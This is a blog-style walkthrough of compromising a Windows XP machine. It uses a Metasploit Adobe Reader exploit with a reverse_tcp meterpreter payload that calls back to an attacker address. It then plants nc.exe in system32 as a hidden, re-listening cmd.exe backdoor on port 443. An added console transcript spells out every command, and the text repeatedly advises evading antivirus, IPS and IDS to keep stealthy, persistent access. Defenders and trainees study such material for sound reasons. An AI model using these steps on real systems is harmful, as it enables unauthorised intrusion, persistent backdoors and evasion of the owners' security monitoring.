Netcat is a useful security/networking tool that has been around since the dawn of the dinosaurs. It still holds credibility amongst security professionals today, probably because its small footprint and versatile design make it an effective "swiss army knife" for most computer enthusiasts. Penetration tests sometimes require the security professional to maintain access to a compromised target even after he loses the original avenue of attack. A network IPS, firewall or antivirus product can trip after the fact, for instance when you try to implant a Trojan as your backdoor. That can cause your Metasploit meterpreter session to lose its connection to the target, and may even get a new policy created that blocks your IP address. After working so hard to get the client-side attack to land, you wouldn't want all of that effort to go in vain.
Using netcat (or cryptcat) to pop command shells from the compromised target on alternate ports/IP addresses is still an effective way of staying under the radar and keeping access. For instance, not all antivirus software will flag the nc.exe program. That's not to say you couldn't do all of this with Metasploit or some other tool, but it's cool to use alternative methods and change it up sometimes ;-)
(I don't condone unethical hacking. Use at your own risk!!!)
Example (Objectives):
- Target Image: Windows XP running vulnerable version of Adobe Reader (7, 8)
- Attack Image: Whatever you want
- Pop a shell on a windows target using the client-side Metasploit Universal Adobe exploit
- Upload "nc.exe" to a safe location on the compromised target (ideally somewhere a virus scanner isn't running and an integrity-checking tool isn't watching) and start a netcat/cryptcat listener that runs "cmd.exe" on a common port
- On the attack system, use netcat to connect to the listening port on the compromised system...bam...instant command shell (if you use cryptcat on both ends the traffic is encrypted, which helps evade a network IDS)
- Repeat as many times as necessary, but not too much! Stay stealthy!
- On the attack image launch the metasploit 3.x command console
- Use the Adobe Acrobat universal exploit. You can find it with the search command in msfconsole
command: use <exploit name>
- The prompt should now show the exploit you selected. Set the options for the exploit and payload
(set every value the "show options" output says is required)
Example:
command: set LHOST yourip
command: set SRVPORT 80
command: set URIPATH adobe
command: set payload windows/meterpreter/reverse_tcp
command: exploit
(should start http listener on your attack image)
- On your Windows XP target, open a browser window and enter http://ipaddress/adobe/urlstring to launch the exploit (Adobe Reader should attempt to open the document and hang)
- On your attack system see if the exploit ran successfully
(Metasploit will tell you if the exploit was successful and if a session was created with the compromised system. If not...try again or try another exploit/avenue of attack...)
- If all went well you should now be in your new session.
- Now use the meterpreter shell to upload the nc.exe program to the compromised system
- Copy the nc.exe file into the installdirectory/Framework3/msf3 directory on the attack system. This is where your meterpreter shell will look for nc.exe when you use the upload function (upload resolves local paths relative to the directory msfconsole was started in)
- Now run the upload command in the meterpreter shell to upload nc.exe to the target's system32 directory
- Now use meterpreter's execute command to launch nc.exe as a hidden background process (not a Windows service; it dies on reboot). Give nc.exe the -L ("listen harder") flag so it re-listens after every client disconnects; with plain -l the first shell you pop is also the last one
(The process should be created on the compromised system)
- Use netcat on your attack image to connect to the port hosting the command shell (cmd.exe)
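Here is the whole sequence pulled together as a console transcript. This is an added example, not from the original post: the addresses (attacker 192.168.1.10, target 192.168.1.20), the bind port 443, the session number and the exploit placeholder are assumptions. Fill in the module name your own search returns and the URL msfconsole prints.

```text
# --- msfconsole on the attack box (192.168.1.10 is an assumed address) ---
msf > search adobe
msf > use <exploit name from the search results>
msf > set LHOST 192.168.1.10
msf > set SRVPORT 80
msf > set URIPATH adobe
msf > set payload windows/meterpreter/reverse_tcp
msf > exploit
# ...the XP box browses to the URL msfconsole printed (http://192.168.1.10/adobe/...)
#    and Reader hangs; a session should appear...
msf > sessions -l
msf > sessions -i 1

# --- meterpreter on the compromised box (192.168.1.20 is an assumed address) ---
# upload reads nc.exe relative to the directory msfconsole was started in;
# meterpreter wants Windows backslashes doubled
meterpreter > upload nc.exe C:\\WINDOWS\\system32
# -L  re-listen after each client disconnects (plain -l gives you one shell only)
# -d  detach nc.exe from its console; -H makes meterpreter hide the window
# -e  program to hand the socket to; 443 is an assumed "common port" choice
meterpreter > execute -f C:\\WINDOWS\\system32\\nc.exe -a "-L -d -p 443 -e cmd.exe" -H
# check: nc.exe should now show up in the process list
meterpreter > ps

# --- back on the attack box, from an ordinary shell ---
$ nc -v 192.168.1.20 443
# a cmd.exe prompt comes back; reconnect as often as you need
```

Two caveats worth knowing before you rely on this. First, a netcat -e listener has no authentication at all: anyone who can reach 443 on that box gets cmd.exe, and the open port shows up in netstat and in any port scan, so pick the port with that in mind. Second, on XP SP2 and later the Windows Firewall blocks inbound connections by default, so check that the port is reachable (or add an exception from your meterpreter shell) before you drop the Metasploit session. If you prefer cryptcat, use the same flags on both ends and add -k yourkey to both the listener and the client so they share the same encryption key.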
Now you should have another remote back door. Connect as many times as you want and open up as many shells as you need. Then close out of your meterpreter session, exit Metasploit.....look....you still have a shell :-)